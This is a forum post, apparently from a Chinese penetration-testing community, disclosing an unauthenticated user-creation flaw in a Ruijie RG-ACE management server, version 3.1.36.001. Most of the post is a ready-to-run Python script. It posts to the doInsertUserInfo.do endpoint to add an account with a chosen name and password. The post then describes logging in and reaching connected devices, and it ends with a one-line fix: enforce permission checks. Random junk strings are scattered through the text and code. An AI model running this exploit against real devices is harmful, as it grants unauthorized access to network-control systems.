找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 锐捷应用控制引擎管理服务器可以增加用户
返回列表 发新帖
查看: 2591|回复: 0
打印 上一主题 下一主题

锐捷应用控制引擎管理服务器可以增加用户

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-10 10:16:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)
( }+ y5 v$ N+ v% F$ @" T  D9 a8 {+ ~3 C& R3 L2 B  J

& C) o. _4 \2 B( b测试的具体版本是
3 h3 x, T5 \# Q! k3 K& G产品名称: 锐捷应用控制引擎
( `1 v7 H/ h) }1 Y! k  L1 B) s- {. V版本号: 3.1.36.001 TC
+ j6 {% ~5 T7 \" p" B编译时间: 201104291730# v  l! |1 K( g% i
" A( C2 X# k7 g5 Y/ ?
6 b- ?: j- o2 r: s
漏洞证明:7 a: M5 \. W( T9 M3 y! ^  T$ y1 O
8 h4 Z8 y: J: _8 d
2 f) ^( U* H5 X$ J8 p0 h

. Z- j& q$ d# T
; H- f: |1 F( }8 O" l6 [
/ A) \4 o* K8 x8 m
0 |  c6 S- y# U执行脚本
- E& T/ ~* n6 }9 E" r#! /usr/bin/env python
% V) U8 L- Q  L: w% ]1 _#coding=gbk, U5 ]- O$ i. ~$ ^
#RG-ACE管理服务器 V3.1.36.001
) c6 d3 E5 R% }/ o; q: pimport urllib2, urllib,cookielib' ^( W8 t& r! P8 f
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP1 d8 B0 ?. }7 C: B4 M
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
% K. q/ ^3 m9 w5 ~' K8 @5 e" N0 y% Copener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
: T: r, u* t+ x3 ~. r9 `post=(("event","userManager.doInsertUserInfo"),
  G, c# D9 k0 E* m' J("useractionname","addButtonValue"),
5 K/ }8 g5 p& t: u- L5 L("useropermanager","userManager"),
3 V$ E( `& R2 Z1 V: E9 b( d("userName","t"), #######账号自己加
# g1 r' H$ P: I6 G("pwd","aaaaaa"),######密码自己加
/ W' V4 T9 _1 S0 I("trueName","ad"),
% b0 J' s4 F3 P3 C, O8 O("email",""),4 X- `) R, a# z4 d6 `8 B  v/ Z" g9 @5 Y
("mobilePhone",""),
9 ~& c; Q' V% R5 @/ N6 q("officePhone",""),
6 A# {' u5 X1 o1 X("addr",""),
" G1 F+ Q$ S5 K("submit","确定"))$ Z( m0 P- J( j! q! {5 R- U
urllib2.install_opener(opener)- b% K- K7 a% N: F: q. X
p=urllib2.urlopen(url, urllib.urlencode(post)).read()8 M5 L( S4 m) R' k% V
print "Done"
* O+ q$ Z. ^* @0 J; o, o7 g/ A4 u0 m8 e4 o4 C" n
登录,连接设备
4 V' _, x' E; @- M: x9 x5 A& d- [: |6 V) {3 u* P4 i
  h, T, w5 ]4 U) u2 g5 L; I

1 e0 h3 S' x. b+ `
. v: N, T, w0 C  M) v1 ]0 h6 O  @4 @
默认的管理员admin权限更大点# i' O$ b& s2 l# |8 m2 F% Q0 Q! q) c
) w' u; r+ b$ @, y
$ J" H1 s" w( |2 ?" C  h
/ c' b9 ?; m5 \3 q( a6 i
8 h2 r* V9 F! {/ `
- D8 d3 m0 U. o# C
修复方案:, e) ~3 M4 @2 e4 ?9 E7 N
加强对接口的权限验证* M* v. Q) L# {+ x5 p5 E$ ]5 @

" K# O: u4 F$ H& y3 G
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表